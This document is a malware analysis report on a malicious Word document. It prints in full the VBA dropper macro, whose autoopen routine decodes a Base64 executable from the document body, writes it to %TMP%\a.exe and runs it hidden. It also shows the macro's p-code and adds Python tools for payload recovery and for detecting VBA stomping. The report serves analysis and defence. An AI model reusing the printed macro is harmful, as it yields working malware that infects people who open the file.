Verdict: MALICIOUS (Risk Score 218)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1140 Deobfuscate/Decode Files or Information
- T1204.002 User Execution: Malicious File
- T1027 Obfuscated Files or Information
The sample is a malicious Word document (OLE format) carrying a VBA macro in the `ThisDocument` module, extracted below as `macros.bas`. Its `autoopen` subroutine runs when the document is opened and acts as a dropper for a second-stage executable that is carried inside the document itself: it reads the text of the third paragraph (`ActiveDocument.Paragraphs(3).Range.Text`), strips the first character and the trailing paragraph mark (`Mid(text, 2, Len(text) - 2)`), decodes the remainder with a hand-written Base64 implementation (`Init` builds the `Map1`/`Map2` alphabet tables, `Base64Decode` does the 4-to-3 unpacking), writes the bytes to `%TMP%\a.exe` (`Environ("tmp") & "\a.exe"`, opened `For Binary Access Write`) and launches the file with `Shell filename, vbHide`, so no window is shown to the user. Two points matter for triage: the macro performs no network activity, so the payload is fully recoverable from the document body without running anything, and the hand-rolled decoder means there is no `MSXML2.DOMDocument` or `ADODB.Stream` Base64 call for string-based rules to match. The dropped `a.exe` was not analysed in this report, so its behaviour is unknown.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6385029-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Agent-6385029-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script: `Shell filename, vbHide` / `End Sub`.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script: `Sub autoopen()` / `Dim handle As Long`.
- Environ() call, environment variable access (low, OLE_VBA_ENVIRON). Matched lines in script: `filename = Environ("tmp") & "\a.exe"` / `handle = FreeFile`.
  Taken together, these three matches are the whole dropper chain: resolve %TMP%, write a.exe there, run it hidden.
- Heap-spray pattern detected (high, SC_HEAP_SPRAY). Repeated 0x41 ('A') bytes found.
  Disassembly: an attempted x86 decode of the run. Since 0x41 is the one-byte opcode for `inc ecx`, the 96 bytes at file offsets 00000E93 through 00000EF2 disassemble to 96 consecutive `inc ecx` instructions (the analyzer lists every one; they are collapsed here).
  Caveat: in Base64, four 'A' characters encode three zero bytes, so a Base64-encoded executable (whose DOS and PE headers and section padding are largely zero-filled) always contains long runs of 0x41. Given that this dropper stores its payload as Base64 text in the document body, the run is most plausibly part of that payload rather than an independent shellcode NOP-style sled, and the disassembly is of ASCII text that is never executed as code. Weight this finding as corroborating the dropper behaviour, not as a separate exploitation primitive.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  Note: the generic rule text does not fit this sample. A VBA project was recovered (macros.bas below), so the marker is most likely the `autoopen` procedure name already reported by OLE_VBA_AUTOOPEN rather than a separate WordBasic macro.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
  This is the DrawingML XML namespace identifier that appears in Office documents containing drawing or picture objects; it is not a download or C2 indicator, and the macro itself performs no network access.
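The recovery path described in the summary, and the Base64 explanation for the 0x41 run, as an added Python example (not code from the report, the analyzer or the sample): it re-implements the macro's `ConvertStringToBytes`, `Base64Decode` and `Mid(text, 2, Len(text) - 2)` logic so the embedded executable can be carved from the third paragraph's text without executing anything, checks that the result has a DOS/PE header, and measures the run of 'A' bytes that a Base64-encoded PE produces. The paragraph text, the `#` sentinel character and the fake PE image are constructed for the demonstration; the report does not say what the real sample's first character is.

```python
"""Recover the dropper's second-stage payload statically, without running the
macro, by re-implementing the decoding path autoopen() performs:
Paragraphs(3).Range.Text -> Mid(text, 2, Len - 2) -> Base64Decode -> a.exe.
Added example; not code from the report or the sample. The paragraph text,
the '#' sentinel and the fake PE image are constructed for the demonstration."""
import base64
import hashlib

# Map1 in the macro's Init(): A-Z, a-z, 0-9, '+', '/' (the standard alphabet).
MACRO_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                  "abcdefghijklmnopqrstuvwxyz"
                  "0123456789+/")
# Map2 in Init(): reverse lookup; anything absent is an illegal character.
MACRO_MAP2 = {ord(c): i for i, c in enumerate(MACRO_ALPHABET)}


def convert_string_to_bytes(text: str) -> bytes:
    """Mirror ConvertStringToBytes(): a VBA String is UTF-16LE, the macro
    takes each 16-bit unit and replaces anything >= 256 with '?'."""
    raw = text.encode("utf-16-le")
    units = (raw[i] | (raw[i + 1] << 8) for i in range(0, len(raw), 2))
    return bytes(u if u < 256 else ord("?") for u in units)


def macro_base64_decode(s: str) -> bytes:
    """Mirror Base64Decode(): length must be a multiple of 4, trailing '='
    are dropped, a missing i2/i3 in the last quantum is treated as 'A'."""
    ibuf = convert_string_to_bytes(s)
    ilen = len(ibuf)
    if ilen % 4 != 0:
        raise ValueError("Length of Base64 encoded input string is not a multiple of 4.")
    while ilen > 0 and ibuf[ilen - 1] == ord("="):
        ilen -= 1
    olen = (ilen * 3) // 4
    out = bytearray()
    ip = 0
    while ip < ilen:
        i0, i1 = ibuf[ip], ibuf[ip + 1]   # read unconditionally, as the macro does
        ip += 2
        if ip < ilen:
            i2 = ibuf[ip]; ip += 1
        else:
            i2 = ord("A")
        if ip < ilen:
            i3 = ibuf[ip]; ip += 1
        else:
            i3 = ord("A")
        quad = []
        for c in (i0, i1, i2, i3):
            if c > 127 or c not in MACRO_MAP2:
                raise ValueError("Illegal character in Base64 encoded data.")
            quad.append(MACRO_MAP2[c])
        b0, b1, b2, b3 = quad
        # Same arithmetic as the macro: (b0 * 4) Or (b1 \ &H10), and so on.
        for o in ((b0 << 2) | (b1 >> 4),
                  ((b1 & 0xF) << 4) | (b2 >> 2),
                  ((b2 & 3) << 6) | b3):
            if len(out) < olen:
                out.append(o)
    return bytes(out)


def recover_payload(paragraph_text: str) -> bytes:
    """Mirror autoopen(): Mid(text, 2, Len(text) - 2) drops the first
    character and the last one (Word's paragraph mark, vbCr)."""
    return macro_base64_decode(paragraph_text[1:-1])


def is_pe_image(data: bytes) -> bool:
    """Sanity check on the carved file: MZ header, and a PE signature at the
    e_lfanew offset stored little-endian at bytes 0x3C..0x40."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed stand-in for a.exe: a DOS header whose e_lfanew points at a
    PE signature, with the zero-filled padding a real header also has."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)        # 0x40-byte DOS header
    dos[0x3C:0x40] = (0x80).to_bytes(4, "little")  # e_lfanew = 0x80
    stub = b"\x00" * (0x80 - len(dos))             # zero padding up to 0x80
    return bytes(dos) + stub + b"PE\x00\x00" + b"\x00" * 60


def build_paragraph(payload: bytes, sentinel: str = "#") -> str:
    """Constructed paragraph laid out the way the macro expects it: one leading
    character it discards (the real sample's first character is not given in
    the report), the Base64 text, then the paragraph mark."""
    return sentinel + base64.b64encode(payload).decode("ascii") + "\r"


def longest_run_of_0x41(text: str) -> int:
    """Longest run of 'A' (0x41) in the Base64 text. Four 'A's encode three
    zero bytes, so PE header padding yields exactly what a byte-level
    heap-spray heuristic matches."""
    best = cur = 0
    for ch in text:
        cur = cur + 1 if ch == "A" else 0
        best = max(best, cur)
    return best


if __name__ == "__main__":
    fake = build_fake_pe()
    para = build_paragraph(fake)
    recovered = recover_payload(para)
    print("recovered == original:", recovered == fake)
    print("looks like a PE image:", is_pe_image(recovered))
    print("SHA-256:", hashlib.sha256(recovered).hexdigest())
    print("longest 0x41 run in the Base64 text:", longest_run_of_0x41(para))
```

Feed `recover_payload()` the text of paragraph 3 however you extract it from the sample (it must still carry its first character and trailing paragraph mark, otherwise apply the decoder directly); if `is_pe_image()` is false, the output is still worth hashing and inspecting, since the macro runs whatever it writes.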
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13123 bytes | f1a6d82eec72a29c76b8969308580625ef8ecaaf8dd0918eb194690ee0a0d350 |

Preview of macros.bas (first 1,000 lines of the extracted script, verbatim). The VBA source comes first; the block of `'`-prefixed comments beginning at `' Processing file:` is the p-code disassembly that olevba appends (pcodedmp output) for the `Macros/VBA/ThisDocument` stream. Comparing the two is the standard check for VBA stomping (a forged source stream with different compiled p-code); here they agree on every security-relevant element: the `autoopen` definition, the `"tmp"` and `"\a.exe"` literals, `FreeFile`, `Open ... For Binary Access Write`, `PutRec`, and the two-argument `Shell` call with `vbHide`.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
Sub autoopen()
Dim handle As Long
Dim filename As String
Dim data() As Byte
Dim text As String
Init
filename = Environ("tmp") & "\a.exe"
handle = FreeFile
text = GetEmbedded()
data = Base64Decode(Mid(text, 2, Len(text) - 2))
Open filename For Binary Access Write As #handle
Put #handle, 1, data
Close #handle
Shell filename, vbHide
End Sub
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Public Function Base64Decode(ByVal s As String) As Byte()
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim v As Byte: v = IBuf(UBound(IBuf))
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Function GetEmbedded() As String
GetEmbedded = ActiveDocument.Paragraphs(3).Range.text
End Function
' Processing file: /tmp/qstore__r_ebmmf
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11070 bytes
' Line #0:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x003F
' VarDefn Map1 (As Byte) 0x0017
' Line #1:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x007F
' VarDefn Map2 (As Byte)
' Line #2:
' Line #3:
' FuncDefn (Sub autoopen())
' Line #4:
' Dim
' VarDefn handle (As Long)
' Line #5:
' Dim
' VarDefn filename (As String)
' Line #6:
' Dim
' VarDefn data (As Byte)
' Line #7:
' Dim
' VarDefn Text (As String)
' Line #8:
' ArgsCall Init 0x0000
' Line #9:
' Line #10:
' LitStr 0x0003 "tmp"
' ArgsLd Environ 0x0001
' LitStr 0x0006 "\a.exe"
' Concat
' St filename
' Line #11:
' Ld FreeFile
' St handle
' Line #12:
' ArgsLd GetEmbedded 0x0000
' St Text
' Line #13:
' Ld Text
' LitDI2 0x0002
' Ld Text
' FnLen
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' ArgsLd Base64Decode 0x0001
' St data
' Line #14:
' Ld filename
' Ld handle
' Sharp
' LitDefault
' Open (For Binary Access Write)
' Line #15:
' Ld handle
' Sharp
' LitDI2 0x0001
' Ld data
' PutRec
' Line #16:
' Ld handle
' Sharp
' Close 0x0001
' Line #17:
' Line #18:
' Ld filename
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Init())
' Line #22:
' Dim
' VarDefn c (As Integer)
' VarDefn i (As Integer)
' Line #23:
' QuoteRem 0x0003 0x0009 " set Map1"
' Line #24:
' LitDI2 0x0000
' St i
' Line #25:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "Z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #26:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "a"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #27:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "0"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "9"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #28:
' LitStr 0x0001 "+"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #29:
' LitStr 0x0001 "/"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #30:
' QuoteRem 0x0003 0x0009 " set Map2"
' Line #31:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x007F
' For
' BoS 0x0000
' LitDI2 0x00FF
' Ld i
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #32:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x003F
' For
' BoS 0x0000
' Ld i
' Ld i
' ArgsLd Map1 0x0001
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Function ConvertStringToBytes(ByVal s As String, id_FFFE As ) As Append)
' Line #36:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld s
' St b1
' Line #37:
' Dim
' VarDefn l (As Long)
' BoS 0x0000
' Ld b1
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0002
' IDiv
' St l
' Line #38:
' Ld l
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' Ld b1
' St ConvertStringToBytes
' BoS 0x0000
' ExitFunc
' EndIf
' Line #39:
' Dim
' VarDefn b2 (As Byte)
' Line #40:
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' RedimAs b2 0x0001 (As Byte)
' Line #41:
' Dim
' VarDefn p (As Long)
' Line #42:
' StartForVariable
' Ld p
' EndForVariable
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' For
' Line #43:
' Dim
' VarDefn c (As Long)
' BoS 0x0000
' LitDI2 0x0002
' Ld p
' Mul
' ArgsLd b1 0x0001
' LitDI2 0x0100
' LitDI2 0x0002
' Ld p
' Mul
' LitDI2 0x0001
' Add
' ArgsLd b1 0x0001
' Coerce (Lng)
' Mul
' Add
' St c
' Line #44:
' Ld c
' LitDI2 0x0100
' Ge
' If
' BoSImplicit
' LitStr 0x0001 "?"
' ArgsLd Asc 0x0001
' St c
' EndIf
' Line #45:
' Ld c
' Ld p
' ArgsSt b2 0x0001
' Line #46:
' StartForVariable
' Next
' Line #47:
' Ld b2
' St ConvertStringToBytes
' Line #48:
' EndFunc
' Line #49:
' Line #50:
' FuncDefn (Public Function Base64Decode(ByVal s As String, id_FFFE As ) As Append)
' Line #51:
' Dim
' VarDefn IBuf (As Byte)
' BoS 0x0000
' Ld s
' ArgsLd ConvertStringToBytes 0x0001
' St IBuf
' Line #52:
' Dim
' VarDefn v (As Byte)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' ArgsLd IBuf 0x0001
' St v
' Line #53:
' Dim
' VarDefn ILen (As Long)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' St ILen
' Line #54:
' Line #55:
' Ld ILen
' LitDI2 0x0004
' Mod
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x003D "Length of Base64 encoded input string is not a multiple of 4."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #56:
' Ld ILen
' LitDI2 0x0000
' Gt
' DoWhile
' Line #57:
' Ld ILen
' LitDI2 0x0001
' Sub
' ArgsLd IBuf 0x0001
' LitStr 0x0001 "="
' ArgsLd Asc 0x0001
' Ne
' If
' BoSImplicit
' ExitDo
' EndIf
' Line #58:
' Ld ILen
' LitDI2 0x0001
' Sub
' St ILen
' Line #59:
' Loop
' Line #60:
' Dim
' VarDefn OLen (As Long)
' BoS 0x0000
' Ld ILen
' LitDI2 0x0003
' Mul
' Paren
' LitDI2 0x0004
' IDiv
' St OLen
' Line #61:
' Dim
' VarDefn Out (As Byte)
' Line #62:
' LitDI2 0x0000
' Ld OLen
' LitDI2 0x0001
' Sub
' RedimAs Out 0x0001 (As Byte)
' Line #63:
' Dim
' VarDefn ip (As Long)
' Line #64:
' Dim
' VarDefn op (As Long)
' Line #65:
' Ld ip
' Ld ILen
' Lt
' DoWhile
' Line #66:
' Dim
' VarDefn i0 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i0
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #67:
' Dim
' VarDefn i1 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i1
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #68:
' Dim
' VarDefn i2 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i2
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i2
' EndIf
' Line #69:
' Dim
' VarDefn i3 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i3
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i3
' EndIf
' Line #70:
' LineCont 0x0004 11 00 09 00
' Ld i0
' LitDI2 0x007F
' Gt
' Ld i1
' LitDI2 0x007F
' Gt
' Or
' Ld i2
' LitDI2 0x007F
' Gt
' Or
' Ld i3
' LitDI2 0x007F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #71:
' Dim
' VarDefn b0 (As Byte)
' BoS 0x0000
' Ld i0
' ArgsLd Map2 0x0001
' St b0
' Line #72:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld i1
' ArgsLd Map2 0x0001
' St b1
' Line #73:
' Dim
' VarDefn b2 (As Byte)
' BoS 0x0000
' Ld i2
' ArgsLd Map2 0x0001
' St b2
' Line #74:
' Dim
' VarDefn b3 (As Byte)
' BoS 0x0000
' Ld i3
' ArgsLd Map2 0x0001
' St b3
' Line #75:
' LineCont 0x0004 11 00 09 00
' Ld b0
' LitDI2 0x003F
' Gt
' Ld b1
' LitDI2 0x003F
' Gt
' Or
' Ld b2
' LitDI2 0x003F
' Gt
' Or
' Ld b3
' LitDI2 0x003F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #76:
' Dim
' VarDefn o0 (As Byte)
' BoS 0x0000
' Ld b0
' LitDI2 0x0004
' Mul
' Paren
' Ld b1
' LitHI2 0x0010
' IDiv
' Paren
' Or
' St o0
' Line #77:
' Dim
' VarDefn o1 (As Byte)
' BoS 0x0000
' Ld b1
' LitHI2 0x000F
' And
' Paren
' LitHI2 0x0010
' Mul
' Paren
' Ld b2
' LitDI2 0x0004
' IDiv
' Paren
' Or
' St o1
' Line #78:
' Dim
' VarDefn o2 (As Byte)
' BoS 0x0000
' Ld b2
' LitDI2 0x0003
' And
' Paren
' LitHI2 0x0040
' Mul
' Paren
' Ld b3
' Or
' St o2
' Line #79:
' Ld o0
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' Line #80:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o1
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #81:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o2
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #82:
' Loop
' Line #83:
' Ld Out
' St Base64Decode
' Line #84:
' EndFunc
' Line #85:
' Line #86:
' FuncDefn (Private Function GetEmbedded(id_FFFE As String) As String)
' Line #87:
' LitDI2 0x0003
' Ld ActiveDocument
' ArgsMemLd Paragraphs 0x0001
' MemLd Range
' MemLd Text
' St GetEmbedded
' Line #88:
' EndFunc
' Line #89:
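Triage logic in the spirit of the OLE_VBA_* findings above, plus a VBA-stomping check (does the compiled p-code agree with the decompressed source?), as an added Python example, not the analyzer's own rules: regexes for the report's three VBA indicators and a few extra dropper patterns (named `EX_*` here because they are this example's own, not report rule names), a roll-up verdict, and a check that lists every `LitStr` in the appended p-code dump that is absent from the source stream. `SAMPLE_VBA` is an excerpt constructed from the macro shown above together with a few of its p-code lines; `STOMPED_VBA` is a constructed forgery in which the source is edited but the p-code is not.

```python
"""Static triage of extracted VBA source mirroring the report's OLE_VBA_*
heuristics, plus a VBA-stomping check comparing string literals in the
appended p-code dump with the decompressed source. Added example; the three
OLE_VBA_* names are the report's, the EX_* names and all severities are this
example's own, and SAMPLE_VBA is a constructed excerpt of the page's macro."""
import re

# (rule name, severity, pattern). Patterns run on the source part only.
RULES = [
    ("OLE_VBA_AUTOOPEN", "low",
     re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
                r"(?:autoopen|auto_open|document_open|workbook_open)\b", re.I | re.M)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
    ("OLE_VBA_SHELL", "critical", re.compile(r"^\s*(?:Call\s+)?Shell\b", re.I | re.M)),
    ("EX_BINARY_FILE_WRITE", "medium",
     re.compile(r"\bOpen\b[^\n]*\bFor\s+Binary\b[^\n]*\bWrite\b", re.I)),
    ("EX_HIDDEN_WINDOW", "medium", re.compile(r"\bvbHide\b", re.I)),
    ("EX_EXE_PATH_LITERAL", "high", re.compile(r'"\\[^"\n]*\.exe"', re.I)),
]
PCODE_MARKER = "' Processing file:"
PCODE_LITSTR = re.compile(r"^'\s*LitStr\s+0x[0-9A-Fa-f]+\s+\"(.*)\"\s*$", re.M)


def split_source_and_pcode(text: str):
    """olevba appends the pcodedmp output as VBA comments after the source."""
    idx = text.find(PCODE_MARKER)
    return (text, "") if idx < 0 else (text[:idx], text[idx:])


def scan_vba(text: str):
    """Return (rule, severity, line number, matched text) for each rule hit."""
    source, _ = split_source_and_pcode(text)
    hits = []
    for name, severity, pattern in RULES:
        m = pattern.search(source)
        if m:
            line_no = source.count("\n", 0, m.start()) + 1
            hits.append((name, severity, line_no, m.group(0).strip()))
    return hits


def verdict(hits) -> str:
    """Roll-up: any critical hit is malicious, anything else that fired is
    suspicious, nothing fired is clean."""
    severities = {sev for _, sev, _, _ in hits}
    if "critical" in severities:
        return "malicious"
    return "suspicious" if hits else "clean"


def pcode_literals_missing_from_source(text: str):
    """Stomping check: every string literal the compiled p-code carries must
    also appear, quoted, in the source stream. Anything missing means the
    source shown to the analyst is not what Word would actually execute."""
    source, pcode = split_source_and_pcode(text)
    return [lit for lit in PCODE_LITSTR.findall(pcode)
            if lit and f'"{lit}"' not in source]


# Constructed excerpt of the page's macro plus matching p-code lines.
SAMPLE_VBA = '''Sub autoopen()
Dim handle As Long
Dim filename As String
Init
filename = Environ("tmp") & "\\a.exe"
handle = FreeFile
Open filename For Binary Access Write As #handle
Put #handle, 1, data
Close #handle
Shell filename, vbHide
End Sub
' Processing file: sample.doc
' Line #10:
' LitStr 0x0003 "tmp"
' ArgsLd Environ 0x0001
' LitStr 0x0006 "\\a.exe"
' Line #18:
' ArgsCall Shell 0x0002
'''

# Constructed stomped variant: the source stream is edited to look benign
# while the compiled p-code still references the original literals.
STOMPED_VBA = SAMPLE_VBA.replace('Environ("tmp") & "\\a.exe"', '"C:\\notes.txt"', 1)

if __name__ == "__main__":
    for hit in scan_vba(SAMPLE_VBA):
        print(hit)
    print("verdict:", verdict(scan_vba(SAMPLE_VBA)))
    print("p-code literals missing from stomped source:",
          pcode_literals_missing_from_source(STOMPED_VBA))
```

The stomping check is deliberately one-directional: literals present in the source but absent from the p-code are expected (string constants folded away or unused procedures), while a literal the p-code executes that the source never mentions is the signal worth escalating.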